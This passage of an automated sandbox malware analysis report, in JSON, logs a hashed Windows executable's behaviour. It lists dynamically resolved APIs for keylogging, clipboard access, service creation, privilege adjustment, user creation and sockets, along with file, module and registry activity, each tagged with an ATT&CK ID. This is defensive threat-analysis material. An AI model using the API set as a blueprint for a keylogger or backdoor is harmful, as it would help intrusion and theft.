\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter IsWindow (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter OpenClipboard (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetClipboardData (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter IsClipboardFormatAvailable (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CloseClipboard (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ExitWindowsEx (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetAsyncKeyState (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetWindowInfo (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter IsWindowVisible (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegDeleteKeyA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter StartServiceA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ControlService (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter DeleteService (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter EnumServicesStatusA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter IsValidSecurityDescriptor (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CreateServiceA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ImpersonateLoggedOnUser (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter LockServiceDatabase (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter QueryServiceLockStatusA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ChangeServiceConfig2A (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter UnlockServiceDatabase (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter WSAAsyncSelect (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter __WSAFDIsSet (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter WSAGetLastError (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ioctlsocket (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter htonl (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ntohs (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ntohl (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter sendto (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter recvfrom (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter bind (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter listen (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter accept (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter setsockopt (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter getsockname (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter gethostbyaddr (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter getpeername (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter shutdown (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetShareAdd (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetShareDel (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetShareEnum (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetScheduleJobAdd (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetRemoteTOD (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetUserAdd (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetUserDel (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetUserEnum (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetUserGetInfo (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NetMessageBufferSend (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetIpNetTable (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter DeleteIpNetEntry (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetIfTable (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetTcpTable (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetUdpTable (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter SHChangeNotify (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter EnumProcesses (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter PathRemoveFileSpecA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter SHDeleteKeyA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"GetProcAddress\" with a parameter NtShutdownSystem (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee669@ADVAPI32.dll\"\n \"0e000f00703fe669@ADVAPI32.dll\"\n \"0e000f00cc3fe669@ADVAPI32.dll\"\n \"11001200b447e669@ADVAPI32.dll\"\n \"110012004848e669@ADVAPI32.dll\"\n \"120013008c48e669@ADVAPI32.dll\"\n \"12001300e448e669@ADVAPI32.dll\"\n \"14001500386ee669@ADVAPI32.dll\"\n \"14001500506ee669@ADVAPI32.dll\"\n \"14001500686ee669@ADVAPI32.dll\"\n \"17001800806ee669@ADVAPI32.dll\"\n \"0d000e00986ee669@ADVAPI32.dll\"\n \"11001200a86ee669@ADVAPI32.dll\"\n \"11001200bc6ee669@ADVAPI32.dll\"\n \"0d000e003449e669@SHELL32.dll\"\n \"0d000e00b049e669@SHELL32.dll\"\n \"0f001000fc6fe669@ADVAPI32.dll\"\n \"140015003c70e669@ADVAPI32.dll\"\n \"140015005470e669@ADVAPI32.dll\"\n \"0c000d009c70e669@ADVAPI32.dll\"\n \"0c000d00ac70e669@ADVAPI32.dll\"\n \"0e000f00bc70e669@ADVAPI32.dll\"\n \"0e000f00cc70e669@ADVAPI32.dll\"\n \"0b000c00dc70e669@ADVAPI32.dll\"\n \"180019001473e669@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76860000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"CreateDirectoryA\" with parameter %TEMP%\\alacjvbou (UID: 00000000-00005836)\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" called \"CreateDirectoryA\" with parameter %TEMP%\\alacjvbou\\upoarndaqbhrwtrdrvv (UID: 00000000-00005836)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b\" was detected as \"Microsoft visual C++ 7.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\netapi32.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\SCHEDCLI.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\NETAPI32.DLL\"\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" trying to access non-existent file \"C:\\NETUTILS.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"7001c67bef47068236ee34ddf0520175ef6213277034cb0af321a393295bfe9b.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n 